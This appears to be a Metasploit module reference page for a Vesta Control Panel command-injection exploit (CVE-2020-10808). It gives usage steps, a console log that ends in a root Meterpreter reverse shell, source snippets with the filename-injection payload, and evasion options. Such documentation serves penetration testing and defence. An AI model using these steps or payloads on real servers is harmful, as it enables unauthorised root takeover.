Vesta Control Panel Authenticated Remote Code Execution - Metasploit
This page contains detailed information about how to use the exploit/linux/http/vestacp_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Vesta Control Panel Authenticated Remote Code Execution
Module: exploit/linux/http/vestacp_exec
Source code: modules/exploits/linux/http/vestacp_exec.rb
Disclosure date: 2020-03-17
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): python
Supported platform(s): Python
Target service / protocol: ftp, http, https
Target network port(s): 21, 80, 443, 2121, 3000, 8000, 8008, 8080, 8083, 8443, 8880, 8888
List of CVEs: CVE-2020-10808
This module exploits an authenticated command injection vulnerability in the v-list-user-backups bash script file in Vesta Control Panel to gain remote code execution as the root user.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- first-attempt-fail: The module tends to fail to get a session on the first attempt.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- config-changes: Module modifies some configuration setting on the target machine.
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
msf > use exploit/linux/http/vestacp_exec
msf exploit(vestacp_exec) > exploit
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
USERNAME: The username to login as
PASSWORD: The password to login with
Knowledge Base
Vulnerable Application
This module exploits command injection vulnerability in v-list-user-backups bash script file. Low privileged authenticated users can execute arbitrary commands under the context of the root user.
To exploit this vulnerability, an authenticated attacker with low privileges can request VestaCP backup a file whose file name starts with a '.', followed by the ';' character to escape the current command, and finally the command they wish to execute. During the user backup process, this file name will be evaluated by the v-backup-user bash script, which will not perform appropriate input validation prior to passing this file name to an eval() call. As result, when an attacker tries to list existing backups the injected command will be executed by the v-backup-user bash script and will result in the attacker's injected command being executed as the root user.
Installing the Vulnerable Application on Ubuntu 18.03 LTS
You can install Vesta Control Panel on Ubuntu 18.04 LTS server with the following commands:
ssh [email protected]
curl -O http://vestacp.com/pub/vst-install.sh
bash vst-install.sh
Once you have finished the installation, perform the following actions in order to create a unprivileged user:
1 - Go to https://IP ADDR:8083/
2 - Login with your administrator account.
3 - Click on the "User" section under the top navigation menu. When you move your mouse over the text for the "User" section, it will turn orange. This is the link that you need to click!
4 - The URL in your browser should now be https://IP ADDR:8083/list/user/
5 - Click on the green plus sign on the left side of the page. When you move your mouse over this button, it will say "ADD USER".
6 - In the following user creation form that appears, enter values for the "user", "password", "email", "first name", and "last name" fields. Leave package and language options as is, as these fields do not affect exploitation.
7 - Log out of your admin account.
8 - Browse to https://IP ADDR:8083/
9 - Verify that the new low privileged user has been created and that you can log in using their credentials.
Verification Steps
A successful check of the exploit will look similar to the output shown below:
- Start
msfconsole
use exploit/linux/http/vestacp_exec
- Set
RHOST
- Set
LHOST
- Set
USERNAME
- Set
PASSWORD
- Set
SRVHOST
- Set
SRVPORT
- Run
exploit
- Verify that you are seeing
Successfully authenticated to the FTP service
in the console. - Verify that you are seeing
Successfully uploaded the payload as a file name
in the console. - Verify that you are seeing
Successfully authenticated to the HTTP Service
in the console. - Verify that you are seeing
Scheduled backup has ben started. Exploitation may take up to 5 minutes.
in the console. - Verify that you are seeing
It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
in the console. - Verify that you are seeing
First stage is executed ! Sending 2nd stage of the payload
in the console. - Verify that you are getting a Meterpreter session.
Ubuntu 18.04 LTS with VestaCP 0.9.26
msf5 > use exploit/linux/http/vestacp_exec
msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218
RHOSTS => 192.168.74.218
msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11
USERNAME => user11
msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1
SRVHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081
SRVPORT => 8081
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 32.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s
[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
[+] 192.168.74.218:8083 - Successfully authenticated to the HTTP Service
[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.74.218:8083 - Scheduled backup has been started !
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.74.218
[*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300
msf5 exploit(linux/http/vestacp_exec) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > shell
Process 42978 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
meterpreter > shell
[+] 192.168.74.218:8083 - It seems scheduled backup is done ..! Triggering the payload <3
#
Go back to menu.
Msfconsole Usage
Here is how the linux/http/vestacp_exec exploit module looks in the msfconsole:
msf6 > use exploit/linux/http/vestacp_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/vestacp_exec) > show info
Name: Vesta Control Panel Authenticated Remote Code Execution
Module: exploit/linux/http/vestacp_exec
Platform: Python
Arch: python
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2020-03-17
Provided by:
Mehmet Ince <[email protected]>
Module side effects:
ioc-in-logs
config-changes
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
first-attempt-fail
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8083 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI of the vulnerable instance
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes The username to login as
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits an authenticated command injection
vulnerability in the v-list-user-backups bash script file in Vesta
Control Panel to gain remote code execution as the root user.
References:
https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/
https://nvd.nist.gov/vuln/detail/CVE-2020-10808
Module Options
This is a complete list of options available in the linux/http/vestacp_exec exploit:
msf6 exploit(linux/http/vestacp_exec) > show options
Module options (exploit/linux/http/vestacp_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8083 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI of the vulnerable instance
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes The username to login as
VHOST no HTTP server virtual host
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the linux/http/vestacp_exec exploit:
msf6 exploit(linux/http/vestacp_exec) > show advanced
Module advanced options (exploit/linux/http/vestacp_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FTPDEBUG false no Whether or not to print verbose debug statements
FTPTimeout 16 yes The number of seconds to wait for a reply from an FTP command
FileDropperDelay no Delay in seconds before attempting cleanup
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
ListenerComm no The specific communication channel to use for this service
PassiveMode false no Set true for extended passive (EPSV) ftp mode.
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Payload advanced options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterTryToFork true no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PythonMeterpreterDebug false no Enable debugging for the Python meterpreter
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the linux/http/vestacp_exec module can exploit:
msf6 exploit(linux/http/vestacp_exec) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/vestacp_exec exploit:
msf6 exploit(linux/http/vestacp_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
4 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
5 payload/python/meterpreter/bind_tcp normal No Python Meterpreter, Python Bind TCP Stager
6 payload/python/meterpreter/bind_tcp_uuid normal No Python Meterpreter, Python Bind TCP Stager with UUID Support
7 payload/python/meterpreter/reverse_http normal No Python Meterpreter, Python Reverse HTTP Stager
8 payload/python/meterpreter/reverse_https normal No Python Meterpreter, Python Reverse HTTPS Stager
9 payload/python/meterpreter/reverse_tcp normal No Python Meterpreter, Python Reverse TCP Stager
10 payload/python/meterpreter/reverse_tcp_ssl normal No Python Meterpreter, Python Reverse TCP SSL Stager
11 payload/python/meterpreter/reverse_tcp_uuid normal No Python Meterpreter, Python Reverse TCP Stager with UUID Support
12 payload/python/meterpreter_bind_tcp normal No Python Meterpreter Shell, Bind TCP Inline
13 payload/python/meterpreter_reverse_http normal No Python Meterpreter Shell, Reverse HTTP Inline
14 payload/python/meterpreter_reverse_https normal No Python Meterpreter Shell, Reverse HTTPS Inline
15 payload/python/meterpreter_reverse_tcp normal No Python Meterpreter Shell, Reverse TCP Inline
16 payload/python/shell_bind_tcp normal No Command Shell, Bind TCP (via python)
17 payload/python/shell_reverse_tcp normal No Command Shell, Reverse TCP (via python)
18 payload/python/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via python)
19 payload/python/shell_reverse_udp normal No Command Shell, Reverse UDP (via python)
Evasion Options
Here is the full list of possible evasion options supported by the linux/http/vestacp_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(linux/http/vestacp_exec) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Target is unreachable.
- Web server error! Expected a HTTP 200 response code, but got <RES.CODE> instead.
- Server returned no HTTP cookies
- There is no CSRF token at HTTP response.
- Target is unreachable.
- Credentials are not valid.
- CSRF Token is wrong.
- Server returned no HTTP cookies
- Web server error! Expected a HTTP 302 response code, but got <RES.CODE> instead.
- /list/backup/ is reachable but replied message is unexpected.
- /schedule/backup/ is not reachable.
- Unable to authenticate to FTP service
- Failed to upload the payload to FTP server
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target is unreachable.
Here is a relevant code snippet related to the "Target is unreachable." error message:
76: 'method' => 'GET',
77: 'uri' => normalize_uri(target_uri.path, 'login', '/')
78: })
79:
80: unless res
81: fail_with(Failure::Unreachable, 'Target is unreachable.')
82: end
83:
84: unless res.code == 200
85: fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 200 response code, but got #{res.code} instead.")
86: end
Web server error! Expected a HTTP 200 response code, but got <RES.CODE> instead.
Here is a relevant code snippet related to the "Web server error! Expected a HTTP 200 response code, but got <RES.CODE> instead." error message:
80: unless res
81: fail_with(Failure::Unreachable, 'Target is unreachable.')
82: end
83:
84: unless res.code == 200
85: fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 200 response code, but got #{res.code} instead.")
86: end
87:
88: if res.get_cookies.empty?
89: fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
90: end
Server returned no HTTP cookies
Here is a relevant code snippet related to the "Server returned no HTTP cookies" error message:
84: unless res.code == 200
85: fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 200 response code, but got #{res.code} instead.")
86: end
87:
88: if res.get_cookies.empty?
89: fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
90: end
91:
92: @cookie = res.get_cookies
93: @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
94:
There is no CSRF token at HTTP response.
Here is a relevant code snippet related to the "There is no CSRF token at HTTP response." error message:
91:
92: @cookie = res.get_cookies
93: @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
94:
95: if @csrf_token.empty?
96: fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
97: end
98:
99: print_good('Cookie and CSRF token values successfully retrieved')
100:
101: print_status('Authenticating to HTTP Service with given credentials')
Target is unreachable.
Here is a relevant code snippet related to the "Target is unreachable." error message:
109: 'password' => password
110: }
111: })
112:
113: unless res
114: fail_with(Failure::Unreachable, 'Target is unreachable.')
115: end
116:
117: if res.body.include?('Invalid username or password.')
118: fail_with(Failure::NoAccess, 'Credentials are not valid.')
119: end
Credentials are not valid.
Here is a relevant code snippet related to the "Credentials are not valid." error message:
113: unless res
114: fail_with(Failure::Unreachable, 'Target is unreachable.')
115: end
116:
117: if res.body.include?('Invalid username or password.')
118: fail_with(Failure::NoAccess, 'Credentials are not valid.')
119: end
120:
121: if res.body.include?('Invalid or missing token')
122: fail_with(Failure::UnexpectedReply, 'CSRF Token is wrong.')
123: end
CSRF Token is wrong.
Here is a relevant code snippet related to the "CSRF Token is wrong." error message:
117: if res.body.include?('Invalid username or password.')
118: fail_with(Failure::NoAccess, 'Credentials are not valid.')
119: end
120:
121: if res.body.include?('Invalid or missing token')
122: fail_with(Failure::UnexpectedReply, 'CSRF Token is wrong.')
123: end
124:
125: if res.code == 302
126: if res.get_cookies.empty?
127: fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
Server returned no HTTP cookies
Here is a relevant code snippet related to the "Server returned no HTTP cookies" error message:
122: fail_with(Failure::UnexpectedReply, 'CSRF Token is wrong.')
123: end
124:
125: if res.code == 302
126: if res.get_cookies.empty?
127: fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
128: end
129: @cookie = res.get_cookies
130: else
131: fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 302 response code, but got #{res.code} instead.")
132: end
Web server error! Expected a HTTP 302 response code, but got <RES.CODE> instead.
Here is a relevant code snippet related to the "Web server error! Expected a HTTP 302 response code, but got <RES.CODE> instead." error message:
126: if res.get_cookies.empty?
127: fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
128: end
129: @cookie = res.get_cookies
130: else
131: fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 302 response code, but got #{res.code} instead.")
132: end
133: end
134:
135: def start_backup_and_trigger_payload
136: #
/list/backup/ is reachable but replied message is unexpected.
Here is a relevant code snippet related to the "/list/backup/ is reachable but replied message is unexpected." error message:
174: sleep(30)
175: elsif res.body.include?('Task has been added to the queue.')
176: # Backup process is being initiated
177: print_good('Scheduled backup has been started ! ')
178: else
179: fail_with(Failure::UnexpectedReply, '/list/backup/ is reachable but replied message is unexpected.')
180: end
181: else
182: # The web server couldn't reply to the request within given timeout window because our payload
183: # executed in the background. This means that the res object will be 'nil' due to send_request_cgi()
184: # timing out, which means our payload executed!
/schedule/backup/ is not reachable.
Here is a relevant code snippet related to the "/schedule/backup/ is not reachable." error message:
184: # timing out, which means our payload executed!
185: print_good('Payload appears to have executed in the background. Enjoy the shells <3')
186: is_scheduled_backup_running = false
187: end
188: else
189: fail_with(Failure::UnexpectedReply, '/schedule/backup/ is not reachable.')
190: end
191: end
192: end
193:
194: def payload_implant
Unable to authenticate to FTP service
Here is a relevant code snippet related to the "Unable to authenticate to FTP service" error message:
217: #
218: # Connecting to the FTP service with same creds as web ui.
219: # Implanting the very first stage of payload as a empty file.
220: #
221: if !connect_login
222: fail_with(Failure::NoAccess, 'Unable to authenticate to FTP service')
223: end
224: print_good('Successfully authenticated to the FTP service')
225:
226: res = send_cmd_data(['PUT', ".a';$(#{p});'"], '')
227: if res.nil?
Failed to upload the payload to FTP server
Here is a relevant code snippet related to the "Failed to upload the payload to FTP server" error message:
223: end
224: print_good('Successfully authenticated to the FTP service')
225:
226: res = send_cmd_data(['PUT', ".a';$(#{p});'"], '')
227: if res.nil?
228: fail_with(Failure::UnexpectedReply, 'Failed to upload the payload to FTP server')
229: end
230: print_good('The file with the payload in the file name has been successfully uploaded.')
231: disconnect
232:
233: register_file_for_cleanup("/home/#{username}/.a';$(#{p});'")
Go back to menu.
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13261 Merged Pull Request: Rubocop recently landed modules
- #13249 Merged Pull Request: Cleanup and Description fixes for VestaCP Exploit
- #13094 Merged Pull Request: Adding Vesta Control Panel Remote Code Execution 0day
References
- https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/
- CVE-2020-10808
Authors
- Mehmet Ince <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.